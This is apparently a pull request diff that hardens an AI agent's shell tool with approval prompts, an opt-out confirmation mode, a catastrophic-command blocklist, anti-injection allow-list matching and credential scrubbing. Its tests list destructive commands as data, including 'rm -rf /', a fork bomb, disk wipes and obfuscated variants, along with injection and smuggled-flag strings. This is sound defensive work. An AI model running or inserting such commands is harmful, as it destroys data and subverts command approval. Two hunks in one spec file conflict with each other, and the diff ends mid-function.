### PR TITLE
feat(agent): hardened run_shell_command — Tier-1 security + Tier-2 allow-list + TUI (EXT-9)

### DIFF
--- a/packages/agent/spec/GthDeepAgent.spec.ts
+++ b/packages/agent/spec/GthDeepAgent.spec.ts
@@ -350,6 +350,60 @@ describe('GthDeepAgent', () => {
     expect(createDeepAgentMock.mock.calls[0][0].tools).toEqual([]);
   });
 
+  it('does not set interruptOn when the shell tool is not enabled', async () => {
+    const { GthDeepAgent } = await import('#src/core/GthDeepAgent.js');
+    const agent = new GthDeepAgent(statusUpdate, { resolveTools: vi.fn().mockResolvedValue([]) });
+
+    await agent.init('code', makeConfig());
+
+    expect(createDeepAgentMock.mock.calls[0][0].interruptOn).toBeUndefined();
+  });
+
+  it('sets interruptOn for run_shell_command when shell is enabled and yolo is off', async () => {
+    const { GthDeepAgent } = await import('#src/core/GthDeepAgent.js');
+    const agent = new GthDeepAgent(statusUpdate, { resolveTools: vi.fn().mockResolvedValue([]) });
+    const config = makeConfig({
+      commands: { code: { devTools: { shell: true } } } as any,
+    });
+
+    await agent.init('code', config);
+
+    expect(createDeepAgentMock.mock.calls[0][0].interruptOn).toEqual({
+      run_shell_command: { allowedDecisions: ['approve', 'reject'] },
+    });
+  });
+
+  it('omits interruptOn under yolo (shell enabled, shellYolo true) so the tool runs unconfirmed', async () => {
+    const { GthDeepAgent } = await import('#src/core/GthDeepAgent.js');
+    const agent = new GthDeepAgent(statusUpdate, { resolveTools: vi.fn().mockResolvedValue([]) });
+    const config = makeConfig({
+      commands: { code: { devTools: { shell: true, shellYolo: true } } } as any,
+    });
+
+    await agent.init('code', config);
+
+    expect(createDeepAgentMock.mock.calls[0][0].interruptOn).toBeUndefined();
+    // And it warns loudly about the bypass.
+    expect(statusUpdate).toHaveBeenCalledWith(
+      expect.anything(),
+      expect.stringContaining('YOLO mode')
+    );
+  });
+
+  it('reads the exec command devTools for the interrupt wiring', async () => {
+    const { GthDeepAgent } = await import('#src/core/GthDeepAgent.js');
+    const agent = new GthDeepAgent(statusUpdate, { resolveTools: vi.fn().mockResolvedValue([]) });
+    const config = makeConfig({
+      commands: { exec: { devTools: { shell: true } } } as any,
+    });
+
+    await agent.init('exec', config);
+
+    expect(createDeepAgentMock.mock.calls[0][0].interruptOn).toEqual({
+      run_shell_command: { allowedDecisions: ['approve', 'reject'] },
+    });
+  });
+
   it('stubs client config tools (clones, swapping the body for interrupt)', async () => {
     const { GthDeepAgent } = await import('#src/core/GthDeepAgent.js');
     const clientTool = fakeTool('client_tool', { client: true });

--- a/packages/agent/spec/GthDevToolkit.shell.integration.spec.ts
+++ b/packages/agent/spec/GthDevToolkit.shell.integration.spec.ts
@@ -1,0 +1,114 @@
+/**
+ * Integration tests for the EXT-9 Tier-1 shell hardening. These run REAL shell
+ * commands (no child_process mock) on a POSIX host, exercising the spawn-path
+ * behavior: timeout + process-group kill, stdin-closed, output cap + temp-file
+ * spillover, credential env scrub, and the unbypassable hardline blocklist.
+ */
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
+import { readFileSync } from 'node:fs';
+
+// Keep terminal noise out of the test output but let env (real process.env)
+// flow through so the credential-scrub test is meaningful.
+vi.mock('#src/utils/consoleUtils.js', () => ({
+  displayInfo: vi.fn(),
+  displayError: vi.fn(),
+  displayWarning: vi.fn(),
+}));
+vi.mock('#src/utils/systemUtils.js', async (importOriginal) => {
+  const actual = await importOriginal<typeof import('#src/utils/systemUtils.js')>();
+  return { ...actual, stdout: { write: vi.fn() } };
+});
+
+const isPosix = process.platform !== 'win32';
+const d = isPosix ? describe : describe.skip;
+
+d('GthDevToolkit shell hardening (real spawn)', () => {
+  let GthDevToolkit: typeof import('#src/tools/GthDevToolkit.js').default;
+
+  beforeEach(async () => {
+    ({ default: GthDevToolkit } = await import('#src/tools/GthDevToolkit.js'));
+  });
+
+  afterEach(() => {
+    delete process.env.GSLOTH_FAKE_ANTHROPIC_PROBE;
+    delete process.env.ANTHROPIC_API_KEY;
+  });
+
+  // Helper: invoke the private executeCommand with a given dev-tools config.
+  const run = (command: string, commands = {}) => {
+    const toolkit = new GthDevToolkit(commands);
+    return (
+      toolkit as unknown as { executeCommand(_c: string, _n: string): Promise<string> }
+    ).executeCommand(command, 'run_shell_command');
+  };
+
+  it('kills a long-running command after the configured timeout', async () => {
+    const start = Date.now();
+    const result = await run('sleep 30', { shell: { enabled: true, timeout: 300 } });
+    const elapsed = Date.now() - start;
+    expect(result).toContain('was killed after exceeding');
+    // Should be killed quickly (well before sleep 30 finishes).
+    expect(elapsed).toBeLessThan(10_000);
+  }, 15_000);
+
+  it('does not hang on a command that would read stdin (stdin is closed)', async () => {
+    // `cat` with no args reads stdin; with stdin=ignore it gets EOF and exits.
+    const result = await run('cat', { shell: { enabled: true, timeout: 5000 } });
+    expect(result).toContain('completed successfully');
+  }, 10_000);
+
+  it('caps output and spills the full output to a temp file', async () => {
+    // Print ~50KB; cap at 2KB so it must truncate.
+    const result = await run('for i in $(seq 1 2000); do echo "line-$i-padding-xxxxxxxxxx"; done', {
+      shell: { enabled: true, maxOutputBytes: 2000 },
+    });
+    expect(result).toContain('output truncated');
+    expect(result).toContain('read_file');
+    const match = result.match(/Full output written to (\S+\.log)/);
+    expect(match).not.toBeNull();
+    const onDisk = readFileSync(match![1], 'utf8');
+    // The spilled file holds far more than the 2KB preview budget.
+    expect(onDisk.length).toBeGreaterThan(10_000);
+    expect(onDisk).toContain('line-2000-padding');
+  }, 15_000);
+
+  it('scrubs a provider credential from the child env', async () => {
+    process.env.ANTHROPIC_API_KEY = 'sk-should-not-leak';
+    const result = await run('printf "KEY=[%s]" "$ANTHROPIC_API_KEY"', {
+      shell: { enabled: true, timeout: 5000 },
+    });
+    expect(result).toContain('KEY=[]');
+    expect(result).not.toContain('sk-should-not-leak');
+  }, 10_000);
+
+  it('preserves generic env (PATH) for the child', async () => {
+    const result = await run('test -n "$PATH" && echo HAVE_PATH', {
+      shell: { enabled: true, timeout: 5000 },
+    });
+    expect(result).toContain('HAVE_PATH');
+  }, 10_000);
+
+  it('refuses a hardline command WITHOUT executing, even under yolo', async () => {
+    // shellYolo bypasses confirmation but must NOT bypass the hardline floor.
+    // Use a sentinel file path that the command would touch if it actually ran.
+    const result = await run('rm -rf /', {
+      shell: { enabled: true },
+      shellYolo: true,
+    });
+    expect(result).toContain('blocked by hardline safety policy');
+    expect(result).toContain('even when command confirmation is disabled');
+    expect(result).not.toContain('<COMMAND_OUTPUT>');
+  });
+
+  it('refuses an OBFUSCATED hardline command (normalization works)', async () => {
+    const result = await run('r\\m -rf /', { shell: { enabled: true }, shellYolo: true });
+    expect(result).toContain('blocked by hardline safety policy');
+    expect(result).not.toContain('<COMMAND_OUTPUT>');
+  });
+
+  it('still runs a benign command normally', async () => {
+    const result = await run('echo hello-world', { shell: { enabled: true } });
+    expect(result).toContain('hello-world');
+    expect(result).toContain('completed successfully');
+  }, 10_000);
+});

--- a/packages/agent/spec/GthDevToolkit.simple.spec.ts
+++ b/packages/agent/spec/GthDevToolkit.simple.spec.ts
@@ -11,14 +11,16 @@ vi.mock('child_process', () => childProcessMock);
 const consoleUtilsMock = {
   displayInfo: vi.fn(),
   displayError: vi.fn(),
+  displayWarning: vi.fn(),
 };
 vi.mock('#src/utils/consoleUtils.js', () => consoleUtilsMock);
 
-// Mock systemUtils
+// Mock systemUtils (env is consumed by the shell credential-scrub helper).
 const systemUtilsMock = {
   stdout: {
     write: vi.fn(),
   },
+  env: { PATH: '/usr/bin', HOME: '/home/test' },
 };
 vi.mock('#src/utils/systemUtils.js', () => systemUtilsMock);
 
@@ -143,7 +145,10 @@ describe('GthDevToolkit - Basic Tests', () => {
       // but the shell tool must pass it through (confirmation, not filtering, is the guardrail).
       const result = await shellTool.invoke({ command: 'echo $HOME | cat' });
       expect(result).toContain("Command 'echo $HOME | cat' completed successfully");
-      expect(childProcessMock.spawn).toHaveBeenCalledWith('echo $HOME | cat', { shell: true });
+      expect(childProcessMock.spawn).toHaveBeenCalledWith(
+        'echo $HOME | cat',
+        expect.objectContaining({ shell: true, detached: true, stdio: ['ignore', 'pipe', 'pipe'] })
+      );
     });
   });
 
@@ -179,7 +184,10 @@ describe('GthDevToolkit - Basic Tests', () => {
       expect(consoleUtilsMock.displayInfo).toHaveBeenCalledWith(
         '\n🔧 Executing test_tool: echo test'
       );
-      expect(childProcessMock.spawn).toHaveBeenCalledWith('echo test', { shell: true });
+      expect(childProcessMock.spawn).toHaveBeenCalledWith(
+        'echo test',
+        expect.objectContaining({ shell: true, detached: true, stdio: ['ignore', 'pipe', 'pipe'] })
+      );
     });
 
     it('should handle command failure', async () => {

--- a/packages/agent/spec/GthDevToolkit.simple.spec.ts
+++ b/packages/agent/spec/GthDevToolkit.simple.spec.ts
@@ -108,6 +108,45 @@ describe('GthDevToolkit - Basic Tests', () => {
     });
   });
 
+  describe('run_shell_command (opt-in shell tool)', () => {
+    it('is NOT emitted by default (shell omitted)', () => {
+      toolkit = new GthDevToolkit({ run_tests: 'npm test' });
+      expect(toolkit.tools.map((t) => t.name)).not.toContain('run_shell_command');
+    });
+
+    it('is NOT emitted when shell is false', () => {
+      toolkit = new GthDevToolkit({ shell: false });
+      expect(toolkit.tools.map((t) => t.name)).not.toContain('run_shell_command');
+    });
+
+    it('is emitted when shell is true (bare boolean)', () => {
+      toolkit = new GthDevToolkit({ shell: true });
+      const shellTool = toolkit.tools.find((t) => t.name === 'run_shell_command');
+      expect(shellTool).toBeDefined();
+      expect((shellTool as any).gthDevType).toBe('execute');
+    });
+
+    it('is emitted when shell is { enabled: true } (object form)', () => {
+      toolkit = new GthDevToolkit({ shell: { enabled: true } });
+      expect(toolkit.tools.map((t) => t.name)).toContain('run_shell_command');
+    });
+
+    it('is NOT emitted when shell is { enabled: false }', () => {
+      toolkit = new GthDevToolkit({ shell: { enabled: false } });
+      expect(toolkit.tools.map((t) => t.name)).not.toContain('run_shell_command');
+    });
+
+    it('runs the model-supplied command verbatim (no parameter sanitizing)', async () => {
+      toolkit = new GthDevToolkit({ shell: true });
+      const shellTool = toolkit.tools.find((t) => t.name === 'run_shell_command')!;
+      // A legitimate shell command with a pipe + $ — would be rejected by the path sanitizer,
+      // but the shell tool must pass it through (confirmation, not filtering, is the guardrail).
+      const result = await shellTool.invoke({ command: 'echo $HOME | cat' });
+      expect(result).toContain("Command 'echo $HOME | cat' completed successfully");
+      expect(childProcessMock.spawn).toHaveBeenCalledWith('echo $HOME | cat', { shell: true });
+    });
+  });
+
   describe('buildSingleTestCommand', () => {
     it('should build command with placeholder', () => {
       toolkit = new GthDevToolkit({ run_single_test: 'npm test -- ${testPath}' });

--- a/packages/agent/spec/shellAllowlist.spec.ts
+++ b/packages/agent/spec/shellAllowlist.spec.ts
@@ -1,0 +1,105 @@
+import { afterEach, beforeEach, describe, expect, it } from 'vitest';
+import { mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { join } from 'node:path';
+import {
+  AllowlistStore,
+  PersistedAllowlist,
+  hasWideningFlag,
+  matchesApproval,
+} from '#src/tools/shell/allowlist.js';
+
+describe('hasWideningFlag', () => {
+  it('flags operation-widening flags (git clone transport override)', () => {
+    expect(hasWideningFlag(['git', 'clone', '--upload-pack=evil', 'repo'])).toBe(true);
+    expect(hasWideningFlag(['git', '-c', 'core.sshCommand=evil', 'clone', 'repo'])).toBe(true);
+    expect(hasWideningFlag(['find', '.', '-exec', 'rm', '{}', ';'])).toBe(true);
+  });
+
+  it('does not flag benign flag variants', () => {
+    expect(hasWideningFlag(['git', 'checkout', '-b', 'foo'])).toBe(false);
+    expect(hasWideningFlag(['ls', '-la'])).toBe(false);
+    expect(hasWideningFlag(['git', 'log', '--oneline'])).toBe(false);
+  });
+});
+
+describe('matchesApproval (anti-injection)', () => {
+  it('matches an approved prefix for a benign flag-variant', () => {
+    const session = new AllowlistStore(['git checkout']);
+    expect(matchesApproval('git checkout -b foo bar', { session })).toBe(true);
+    expect(matchesApproval('git checkout main', { session })).toBe(true);
+  });
+
+  it('does NOT match a composed command even when the prefix is approved', () => {
+    const session = new AllowlistStore(['git checkout']);
+    // The classic injection: approved prefix riding a command separator.
+    expect(matchesApproval('git checkout x; rm -rf /', { session })).toBe(false);
+    expect(matchesApproval('git checkout x && rm -rf /', { session })).toBe(false);
+    expect(matchesApproval('git checkout x | sh', { session })).toBe(false);
+    expect(matchesApproval('git checkout $(rm -rf /)', { session })).toBe(false);
+  });
+
+  it('does NOT match a widening flag even when the prefix is approved', () => {
+    const session = new AllowlistStore(['git clone']);
+    expect(matchesApproval('git clone https://x/y.git', { session })).toBe(true);
+    expect(matchesApproval('git clone --upload-pack=evil https://x/y.git', { session })).toBe(
+      false
+    );
+  });
+
+  it('does not match when the prefix is not approved', () => {
+    const session = new AllowlistStore(['npm install']);
+    expect(matchesApproval('git checkout main', { session })).toBe(false);
+  });
+});
+
+describe('AllowlistStore (session scope)', () => {
+  it('has/add set semantics', () => {
+    const s = new AllowlistStore();
+    expect(s.has('git checkout')).toBe(false);
+    s.add('git checkout');
+    expect(s.has('git checkout')).toBe(true);
+    expect(s.list()).toEqual(['git checkout']);
+  });
+});
+
+describe('PersistedAllowlist (always scope)', () => {
+  let dir: string;
+  let file: string;
+
+  beforeEach(() => {
+    dir = mkdtempSync(join(tmpdir(), 'gsloth-allowlist-'));
+    file = join(dir, 'shell-allowlist.json');
+  });
+
+  afterEach(() => {
+    rmSync(dir, { recursive: true, force: true });
+  });
+
+  it('round-trips a prefix through the JSON file', () => {
+    const a = new PersistedAllowlist(file);
+    expect(a.has('git checkout')).toBe(false);
+    a.add('git checkout');
+    expect(a.has('git checkout')).toBe(true);
+
+    // A fresh instance loads from disk.
+    const b = new PersistedAllowlist(file);
+    expect(b.has('git checkout')).toBe(true);
+
+    const onDisk = JSON.parse(readFileSync(file, 'utf8'));
+    expect(onDisk.version).toBe(1);
+    expect(onDisk.prefixes).toContain('git checkout');
+  });
+
+  it('treats a missing file as empty', () => {
+    const a = new PersistedAllowlist(join(dir, 'does-not-exist.json'));
+    expect(a.list()).toEqual([]);
+  });
+
+  it('treats a corrupt file as empty (fail-closed on auto-approval)', () => {
+    const corrupt = join(dir, 'corrupt.json');
+    writeFileSync(corrupt, '{ not valid json', 'utf8');
+    const a = new PersistedAllowlist(corrupt);
+    expect(a.list()).toEqual([]);
+  });
+});

--- a/packages/agent/spec/shellArity.spec.ts
+++ b/packages/agent/spec/shellArity.spec.ts
@@ -1,0 +1,92 @@
+import { describe, expect, it } from 'vitest';
+import { classifyCommand, meaningfulPrefixTokens, tokenize } from '#src/tools/shell/arity.js';
+import { normalizeCommand } from '#src/tools/shell/normalize.js';
+
+const classify = (cmd: string) => classifyCommand(cmd, normalizeCommand);
+
+describe('tokenize', () => {
+  it('splits on whitespace and honors quotes', () => {
+    expect(tokenize('git commit -m "a b c"')).toEqual(['git', 'commit', '-m', 'a b c']);
+    expect(tokenize("echo 'one two'")).toEqual(['echo', 'one two']);
+  });
+
+  it('returns null on unbalanced quotes', () => {
+    expect(tokenize('echo "unterminated')).toBeNull();
+  });
+});
+
+describe('meaningfulPrefixTokens', () => {
+  it('skips boolean leading flags before resolving the table prefix', () => {
+    // `--no-pager` takes no argument, so the subcommand still resolves correctly.
+    expect(meaningfulPrefixTokens(['git', '--no-pager', 'checkout', 'main'])).toEqual([
+      'git',
+      'checkout',
+    ]);
+  });
+
+  it('conservatively (fail-closed) does not special-case arg-taking flags', () => {
+    // We do not maintain a per-flag arity table, so `-C <dir>` leaves `.` in the non-flag
+    // stream and the prefix resolves to `git .` rather than `git checkout`. This does not match
+    // an approved `git checkout`, so it simply re-prompts (safe) instead of mis-approving.
+    expect(meaningfulPrefixTokens(['git', '-C', '.', 'checkout', 'main'])).toEqual(['git', '.']);
+  });
+});
+
+describe('classifyCommand', () => {
+  it('classifies git checkout variants to the same prefix', () => {
+    const a = classify('git checkout main');
+    const b = classify('git checkout -b foo bar');
+    expect(a).not.toBeNull();
+    expect(b).not.toBeNull();
+    expect(a!.prefix).toBe('git checkout');
+    expect(b!.prefix).toBe('git checkout');
+    expect(a!.pattern).toBe('git checkout *');
+  });
+
+  it('classifies arity-3 commands (npm run dev)', () => {
+    const c = classify('npm run dev --silent');
+    expect(c).not.toBeNull();
+    expect(c!.prefix).toBe('npm run dev');
+    expect(c!.pattern).toBe('npm run dev *');
+  });
+
+  it('defaults unknown binaries to arity 0 (just the binary)', () => {
+    const c = classify('frobnicate --wibble foo bar');
+    expect(c).not.toBeNull();
+    expect(c!.prefix).toBe('frobnicate');
+    expect(c!.pattern).toBe('frobnicate *');
+  });
+
+  it('classifies a single-token utility (ls)', () => {
+    const c = classify('ls -la /tmp');
+    expect(c).not.toBeNull();
+    expect(c!.prefix).toBe('ls');
+    expect(c!.pattern).toBe('ls *');
+  });
+
+  it('fails closed on command separators and composition', () => {
+    expect(classify('git checkout x; rm -rf /')).toBeNull();
+    expect(classify('git checkout x && rm -rf /')).toBeNull();
+    expect(classify('git checkout x || true')).toBeNull();
+    expect(classify('cat foo | sh')).toBeNull();
+    expect(classify('git status &')).toBeNull();
+  });
+
+  it('fails closed on command/process substitution', () => {
+    expect(classify('echo $(rm -rf /)')).toBeNull();
+    expect(classify('echo `rm -rf /`')).toBeNull();
+    expect(classify('diff <(ls) <(ls)')).toBeNull();
+    expect(classify('echo ${EVIL}')).toBeNull();
+  });
+
+  it('fails closed on redirections', () => {
+    expect(classify('echo hi > /etc/passwd')).toBeNull();
+    expect(classify('cat < secrets')).toBeNull();
+    expect(classify('echo hi >> log')).toBeNull();
+  });
+
+  it('returns null on empty / unbalanced commands', () => {
+    expect(classify('   ')).toBeNull();
+    expect(classify('echo "open')).toBeNull();
+  });
+});

--- a/packages/agent/spec/shellEnv.spec.ts
+++ b/packages/agent/spec/shellEnv.spec.ts
@@ -1,0 +1,70 @@
+import { describe, expect, it } from 'vitest';
+import { buildScrubbedEnv, shouldScrubEnvVar } from '#src/tools/shell/env.js';
+
+describe('shouldScrubEnvVar', () => {
+  it('scrubs explicit provider/cloud credentials', () => {
+    for (const name of [
+      'ANTHROPIC_API_KEY',
+      'OPENAI_API_KEY',
+      'GOOGLE_API_KEY',
+      'GEMINI_API_KEY',
+      'GOOGLE_APPLICATION_CREDENTIALS',
+      'GROQ_API_KEY',
+      'XAI_API_KEY',
+      'DEEPSEEK_API_KEY',
+      'MISTRAL_API_KEY',
+      'OPENROUTER_API_KEY',
+      'AWS_SECRET_ACCESS_KEY',
+      'AWS_SESSION_TOKEN',
+      'AZURE_OPENAI_API_KEY',
+    ]) {
+      expect(shouldScrubEnvVar(name), name).toBe(true);
+    }
+  });
+
+  it('scrubs by wildcard suffix (unknown provider keys)', () => {
+    expect(shouldScrubEnvVar('SOMENEWPROVIDER_API_KEY')).toBe(true);
+    expect(shouldScrubEnvVar('FOO_SECRET')).toBe(true);
+    expect(shouldScrubEnvVar('BAR_TOKEN')).toBe(true);
+    expect(shouldScrubEnvVar('MY_SECRET_KEY')).toBe(true);
+  });
+
+  it('keeps generic dev env intact', () => {
+    for (const name of [
+      'PATH',
+      'HOME',
+      'SHELL',
+      'LANG',
+      'PWD',
+      'NODE_ENV',
+      'npm_config_registry',
+    ]) {
+      expect(shouldScrubEnvVar(name), name).toBe(false);
+    }
+  });
+
+  it('keeps GITHUB_TOKEN / GH_TOKEN (needed by gh providers)', () => {
+    expect(shouldScrubEnvVar('GITHUB_TOKEN')).toBe(false);
+    expect(shouldScrubEnvVar('GH_TOKEN')).toBe(false);
+  });
+});
+
+describe('buildScrubbedEnv', () => {
+  it('removes credentials and preserves the rest', () => {
+    const source = {
+      PATH: '/usr/bin',
+      HOME: '/home/x',
+      ANTHROPIC_API_KEY: 'sk-secret',
+      OPENAI_API_KEY: 'sk-other',
+      GITHUB_TOKEN: 'ghp_keepme',
+      RANDOM_TOKEN: 'should-go',
+    };
+    const out = buildScrubbedEnv(source);
+    expect(out.PATH).toBe('/usr/bin');
+    expect(out.HOME).toBe('/home/x');
+    expect(out.GITHUB_TOKEN).toBe('ghp_keepme');
+    expect(out.ANTHROPIC_API_KEY).toBeUndefined();
+    expect(out.OPENAI_API_KEY).toBeUndefined();
+    expect(out.RANDOM_TOKEN).toBeUndefined();
+  });
+});

--- a/packages/agent/spec/shellHardline.spec.ts
+++ b/packages/agent/spec/shellHardline.spec.ts
@@ -1,0 +1,62 @@
+import { describe, expect, it } from 'vitest';
+import { checkHardline } from '#src/tools/shell/hardline.js';
+
+describe('checkHardline', () => {
+  const blocked = [
+    'rm -rf /',
+    'rm -rf /*',
+    'rm -fr /',
+    'rm -rf ~',
+    'rm -rf $HOME',
+    'rm -rf /etc',
+    'rm -rf /usr/*',
+    'sudo rm -rf /',
+    'mkfs.ext4 /dev/sda1',
+    'mkfs /dev/sdb',
+    'dd if=/dev/zero of=/dev/sda',
+    'echo x > /dev/sda',
+    ':(){ :|:& };:',
+    'shutdown -h now',
+    'sudo reboot',
+    'poweroff',
+    'systemctl poweroff',
+    'init 0',
+    'chmod -R 777 /',
+    'kill -9 -1',
+  ];
+
+  it.each(blocked)('refuses catastrophic command: %s', (cmd) => {
+    const match = checkHardline(cmd);
+    expect(match, `expected "${cmd}" to be blocked`).not.toBeNull();
+    expect(match!.description).toBeTruthy();
+  });
+
+  it('catches obfuscated rm -rf / (backslash split)', () => {
+    expect(checkHardline('r\\m -rf /')).not.toBeNull();
+  });
+
+  it('catches obfuscated rm -rf / (fullwidth)', () => {
+    expect(checkHardline('ｒｍ -rf /')).not.toBeNull();
+  });
+
+  it('catches obfuscated rm -rf / (whitespace padding + ANSI)', () => {
+    expect(checkHardline('\x1b[1mrm\x1b[0m   -rf    /')).not.toBeNull();
+  });
+
+  const allowed = [
+    'git status',
+    'rm -rf ./build',
+    'rm -rf node_modules',
+    'rm -rf /tmp/my-scratch',
+    'echo reboot',
+    "grep 'shutdown' /var/log/syslog",
+    'chmod -R 777 ./dist',
+    'npm test',
+    'mkfsomething --help',
+    'dd if=in.txt of=out.txt',
+  ];
+
+  it.each(allowed)('allows recoverable / benign command: %s', (cmd) => {
+    expect(checkHardline(cmd), `expected "${cmd}" to be allowed`).toBeNull();
+  });
+});

--- a/packages/agent/spec/shellNormalize.spec.ts
+++ b/packages/agent/spec/shellNormalize.spec.ts
@@ -1,0 +1,36 @@
+import { describe, expect, it } from 'vitest';
+import { normalizeCommand } from '#src/tools/shell/normalize.js';
+
+describe('normalizeCommand', () => {
+  it('folds runs of whitespace and trims', () => {
+    expect(normalizeCommand('  rm    -rf   /  ')).toBe('rm -rf /');
+    expect(normalizeCommand('echo\thi\nthere')).toBe('echo hi there');
+  });
+
+  it('collapses backslash-escapes (r\\m -> rm)', () => {
+    expect(normalizeCommand('r\\m -rf /')).toBe('rm -rf /');
+    expect(normalizeCommand('\\r\\m -rf /')).toBe('rm -rf /');
+  });
+
+  it('drops empty-string literals that split a token', () => {
+    expect(normalizeCommand("r''m -rf /")).toBe('rm -rf /');
+    expect(normalizeCommand('r""m -rf /')).toBe('rm -rf /');
+  });
+
+  it('folds fullwidth Unicode to ASCII (NFKC)', () => {
+    // Fullwidth "rm" -> ascii "rm"
+    expect(normalizeCommand('ｒｍ -rf /')).toBe('rm -rf /');
+  });
+
+  it('strips null bytes', () => {
+    expect(normalizeCommand('rm\x00 -rf /')).toBe('rm -rf /');
+  });
+
+  it('strips ANSI CSI escape sequences', () => {
+    expect(normalizeCommand('\x1b[31mrm\x1b[0m -rf /')).toBe('rm -rf /');
+  });
+
+  it('leaves a benign command intact', () => {
+    expect(normalizeCommand('git status')).toBe('git status');
+  });
+});

--- a/packages/agent/spec/shellOutputBuffer.spec.ts
+++ b/packages/agent/spec/shellOutputBuffer.spec.ts
@@ -1,0 +1,51 @@
+import { describe, expect, it } from 'vitest';
+import { readFileSync } from 'node:fs';
+import { OutputBuffer } from '#src/tools/shell/outputBuffer.js';
+
+describe('OutputBuffer', () => {
+  it('returns output verbatim when under the budget', () => {
+    const buf = new OutputBuffer(1000);
+    buf.append('hello ');
+    buf.append('world');
+    const out = buf.finalize();
+    expect(out.truncated).toBe(false);
+    expect(out.text).toBe('hello world');
+    expect(out.spillPath).toBeUndefined();
+    expect(out.totalBytes).toBe(11);
+  });
+
+  it('keeps head + tail and drops the middle when over budget', () => {
+    const buf = new OutputBuffer(20); // 10 head / 10 tail
+    const head = 'AAAAAAAAAA'; // 10
+    const middle = 'M'.repeat(500);
+    const tail = 'ZZZZZZZZZZ'; // 10
+    buf.append(head + middle + tail);
+
+    let spilled = '';
+    const out = buf.finalize((content) => {
+      spilled = content;
+      return '/tmp/fake-spill.log';
+    });
+
+    expect(out.truncated).toBe(true);
+    expect(out.text.startsWith('AAAAAAAAAA')).toBe(true);
+    expect(out.text.endsWith('ZZZZZZZZZZ')).toBe(true);
+    expect(out.text).toContain('output truncated');
+    expect(out.text).toContain('/tmp/fake-spill.log');
+    expect(out.text).toContain('read_file');
+    // The full output is spilled, not the truncated preview.
+    expect(spilled).toBe(head + middle + tail);
+    expect(out.spillPath).toBe('/tmp/fake-spill.log');
+  });
+
+  it('spills to a real temp file by default and the file holds the full output', () => {
+    const buf = new OutputBuffer(20);
+    const full = 'X'.repeat(2000);
+    buf.append(full);
+    const out = buf.finalize();
+    expect(out.truncated).toBe(true);
+    expect(out.spillPath).toBeTruthy();
+    const onDisk = readFileSync(out.spillPath!, 'utf8');
+    expect(onDisk).toBe(full);
+  });
+});

--- a/packages/agent/src/core/GthDeepAgent.ts
+++ b/packages/agent/src/core/GthDeepAgent.ts
@@ -1,4 +1,5 @@
-import type { GthConfig } from '@gaunt-sloth/core/config.js';
+import type { GthConfig, GthDevToolsConfig } from '@gaunt-sloth/core/config.js';
+import { isShellToolEnabled } from '@gaunt-sloth/core/config.js';
 import { GthAbstractAgent } from '@gaunt-sloth/core/core/GthAbstractAgent.js';
 import { type GthCommand, StatusLevel } from '@gaunt-sloth/core/core/types.js';
 import { debugLog, debugLogObject } from '@gaunt-sloth/core/utils/debugUtils.js';
@@ -13,7 +14,7 @@ import { getCurrentWorkDir } from '@gaunt-sloth/core/utils/systemUtils.js';
 import { AIMessage, ToolMessage } from '@langchain/core/messages';
 import type { StructuredToolInterface } from '@langchain/core/tools';
 import type { BaseCheckpointSaver } from '@langchain/langgraph';
-import { createMiddleware } from 'langchain';
+import { createMiddleware, type InterruptOnConfig } from 'langchain';
 import { createDeepAgent, FilesystemBackend } from 'deepagents';
 import {
   buildPermissions,
@@ -50,6 +51,18 @@ export interface GthDeepAgentParams {
    * no prompt content is composed (lets deepagents use only its base prompt).
    */
   systemPrompt: string | undefined;
+  /**
+   * Per-tool human-in-the-loop configuration passed straight to
+   * `createDeepAgent({ interruptOn })` (deepagents installs LangChain's
+   * `humanInTheLoopMiddleware` for it). A matching tool call suspends the graph with a
+   * `__interrupt__` (a `HITLRequest`) so a consumer can approve/reject before the tool runs;
+   * resume with `new Command({ resume: { decisions: [...] } })` on the same `thread_id`.
+   *
+   * gsloth currently sets this only for the opt-in `run_shell_command` tool (when its
+   * `devTools.shell` is enabled and `devTools.shellYolo` is NOT). Left `undefined` otherwise —
+   * including under yolo — so no tool is gated and runs never suspend for approval.
+   */
+  interruptOn?: Record<string, boolean | InterruptOnConfig>;
 }
 
 /**
@@ -172,6 +185,10 @@ export class GthDeepAgent extends GthAbstractAgent {
       middleware: middleware as any,
       backend,
       permissions: params.permissions,
+      // Per-tool human-in-the-loop gating (e.g. run_shell_command confirmation). When set,
+      // deepagents installs humanInTheLoopMiddleware so a matching tool call suspends the graph
+      // for approval; `undefined` (the default, and under yolo) leaves every tool ungated.
+      interruptOn: params.interruptOn,
       checkpointer,
     });
     debugLog('Deep agent created successfully');
@@ -353,13 +370,58 @@ export class GthDeepAgent extends GthAbstractAgent {
     const systemPrompt =
       typeof systemMessages[0]?.content === 'string' ? systemMessages[0].content : undefined;
 
+    // Gate the opt-in run_shell_command tool behind a per-command approval interrupt. The tool
+    // is only emitted (by GthDevToolkit, via builtInToolsConfig) when its devTools.shell flag is
+    // set; mirror the same per-command devTools resolution here so the interrupt is wired only
+    // when the tool actually exists. yolo (shellYolo) opts OUT of the confirmation: leave
+    // interruptOn undefined so the tool runs without suspending.
+    const devTools = this.getEffectiveDevToolsConfig();
+    const interruptOn =
+      isShellToolEnabled(devTools) && devTools?.shellYolo !== true
+        ? ({ run_shell_command: { allowedDecisions: ['approve', 'reject'] } } as Record<
+            string,
+            boolean | InterruptOnConfig
+          >)
+        : undefined;
+    if (interruptOn) {
+      this.statusUpdate(
+        StatusLevel.INFO,
+        'Shell tool (run_shell_command) enabled with per-command approval (interruptOn).'
+      );
+    } else if (isShellToolEnabled(devTools)) {
+      this.statusUpdate(
+        StatusLevel.WARNING,
+        'Shell tool (run_shell_command) enabled in YOLO mode: commands run WITHOUT confirmation.'
+      );
+    }
+
     return {
       model: this.config.llm,
       tools: passThroughTools as StructuredToolInterface[],
       permissions,
       middleware,
       systemPrompt,
+      interruptOn,
     };
+  }
+
+  /**
+   * Resolve the {@link GthDevToolsConfig} that applies to the active command, mirroring the
+   * per-command selection in `builtInToolsConfig.getDefaultTools` (which is what actually emits
+   * the dev tools): `exec` → `commands.exec.devTools`, `ask --write` → `commands.ask.devTools`,
+   * otherwise (`code`) → `commands.code.devTools`. Returns `undefined` for any other command,
+   * matching the toolkit being inert there. Kept private and side-effect-free so the interrupt
+   * wiring above and the tool emission stay in lockstep.
+   */
+  private getEffectiveDevToolsConfig(): GthDevToolsConfig | undefined {
+    const config = this.config;
+    if (!config) return undefined;
+    const command = this.command;
+    const askWrite = command === 'ask' && config.askWriteMode === true;
